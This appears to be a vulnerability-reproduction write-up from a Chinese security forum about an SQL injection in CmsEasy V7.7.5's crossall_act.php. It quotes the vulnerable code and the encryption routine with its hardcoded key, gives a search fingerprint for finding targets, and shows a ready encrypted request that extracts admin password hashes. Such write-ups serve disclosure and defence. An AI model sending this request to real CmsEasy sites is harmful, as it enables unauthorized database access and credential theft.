问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
CmsEasy crossall_act.php SQL注入漏洞
# CmsEasy crossall_act.php SQL注入漏洞 ## 漏洞描述 CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令 ## 影响版本 CmsEasy V7.7.5_20210919...
CmsEasy crossall\_act.php SQL注入漏洞 ================================= 漏洞描述 ---- CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令 影响版本 ---- CmsEasy V7.7.5\_20210919 网络测绘 ---- body="cmseasyedit" 环境搭建 ---- <https://www.cmseasy.cn/chm/faq/show-645.html> ![img](https://shs3.b.qianxin.com/butian_public/f869871bf83bf2ac0139644fb9d4d8e48d42a784675b4.jpg) 漏洞复现 ---- 主页面 ![img](https://shs3.b.qianxin.com/butian_public/f6280081b93366e95eb5bfcf754570ab6374354238f56.jpg) 存在漏洞的文件为 `lib/default/crossall_act.php` ![img](https://shs3.b.qianxin.com/butian_public/f698384525534f1e68a7c997be16052d089085c7f3799.jpg) 其中需要注意的代码为 ```php function execsql_action(){ $sqlquery=front::get("sql"); $sqlquery=service::getInstance()->unlockString($sqlquery,"cmseasy_sql"); $returndata=tdatabase::getInstance()->rec_query_one($sqlquery); echo json_encode($returndata); exit; } function execsqls_action(){ $sqlquery=front::get("sql"); $sqlquery=service::getInstance()->unlockString($sqlquery,"cmseasy_sql"); $returndata=tdatabase::getInstance()->rec_query($sqlquery); echo json_encode($returndata); exit; } function execupdate_action(){ $sqlquery=front::get("sql"); $sqlquery=service::getInstance()->unlockString($sqlquery,"cmseasy_sql"); $returndata=tdatabase::getInstance()->query($sqlquery); echo json_encode($returndata); exit; } ``` 代码中传入参数 sql, 然后使用方法 unlockString 解码执行 SQL语句 查看文件 `lib/table/service.php` ```php public static function lockString($txt,$key='cmseasy_sql') { $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-=+"; $nh = rand(0,64); $ch = $chars[$nh]; $mdKey = md5($key.$ch); $mdKey = substr($mdKey,$nh%8, $nh%8+8); $txt = base64_encode($txt); $tmp = ''; $i=0;$j=0;$k = 0; for ($i=0; $i<strlen($txt); $i++) { $k = $k == strlen($mdKey) ? 0 : $k; $j = ($nh+strpos($chars,$txt[$i])+ord($mdKey[$k++]))%64; $tmp .= $chars[$j]; } return urlencode($ch.$tmp); } /**对字符串进行解密。 crossall_act文件使用 * @param $txt * @param string $key * @return bool|string */ public static function unlockString($txt,$key='cmseasy_sql') { $txt = urldecode($txt); $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-=+"; $ch = $txt[0]; $nh = strpos($chars,$ch); $mdKey = md5($key.$ch); $mdKey = substr($mdKey,$nh%8, $nh%8+8); $txt = substr($txt,1); $tmp = ''; $i=0;$j=0; $k = 0; for ($i=0; $i<strlen($txt); $i++) { $k = $k == strlen($mdKey) ? 0 : $k; $j = strpos($chars,$txt[$i])-$nh - ord($mdKey[$k++]); while ($j<0) $j+=64; $tmp .= $chars[$j]; } return base64_decode($tmp); } ``` 文件中得到了 `$key='cmseasy_sql'` 和加解密方法,构造请求获取账号密码md5 ![img](https://shs3.b.qianxin.com/butian_public/f14089811209429fbc42029c2ea09e7e364cc99207cab.jpg) ```php /?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 ``` ![img](https://shs3.b.qianxin.com/butian_public/f74627636584aceb7853428ba6ce6c374a06149b92f62.jpg)
发表于 2024-07-12 18:43:30
阅读 ( 2205 )
分类:
CMS
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!